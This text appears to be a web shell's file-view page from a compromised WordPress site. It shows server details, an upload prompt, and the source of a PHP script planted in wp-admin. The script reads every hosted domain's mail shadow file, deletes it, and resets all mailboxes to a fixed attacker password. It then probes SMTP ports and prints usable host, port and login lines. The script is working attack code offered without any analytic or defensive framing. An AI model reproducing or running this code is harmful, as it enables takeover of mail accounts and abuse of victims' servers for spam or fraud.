https://t.me/RX1948
Server : LiteSpeed
System : Linux srv526460274 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
User : kerao9884 ( 1082)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Directory :  /home/token55.net/public_html/wp-admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/token55.net/public_html/wp-admin/3ki5p8wm.php
<?php
set_time_limit(0);
error_reporting(0);
ini_set('max_execution_time',0);
ini_set('memory_limit',-1);
// port to scan
$ports=array(587, 26, 25, 465);
//curent user
$user=get_current_user();
function rndStr($length = 10)
{
    $characters = '123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString;
}
$salt = rndStr();
// Smtp password
$password="n0b0dy_smtp_pass";
//crypt
$pwd = crypt($password, '$6$'.$salt.'$');
// host name
 $t = $_SERVER['SERVER_NAME'];
//edit
 $t = @str_replace("www.","",$t);
 
$dirs = glob('/home/'.$user.'/etc/*', GLOB_ONLYDIR);
foreach($dirs as $dir){
$ex = explode("/",$dir);
$site =  $ex[count($ex)-1];


 //get users
@$passwd = file_get_contents('/home/'.$user.'/etc/'.$site.'/shadow');
//edit
$ex=explode("\r\n",$passwd);
//backup shadow
@link('/home/'.$user.'/etc/'.$site.'/shadow','/home/'.$user.'/etc/'.$site.'/shadow.'.$password.'.bak');
//delete shadow
@unlink('/home/'.$user.'/etc/'.$site.'/shadow');
// :D

foreach($ex as $ex){
    $ex=explode(':',$ex);
    $e= $ex[0];

    if ($e){
        $b=fopen('/home/'.$user.'/etc/'.$site.'/shadow','ab');
        fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b);
        // $siteList = [];
        foreach($ports as $pport){
            // if(in_array($site, $siteList)){
            //     continue;
            // }
            $connection = @fsockopen($site, $pport);
            if (is_resource($connection))
            {   
                echo $site.'|'.$pport.'|'.$e.'@'.$site.'|'.$password."\n";
                break;
            }
            // $siteList[] = $site;
        }
    }
}
}
?>

https://t.me/RX1948 - 2025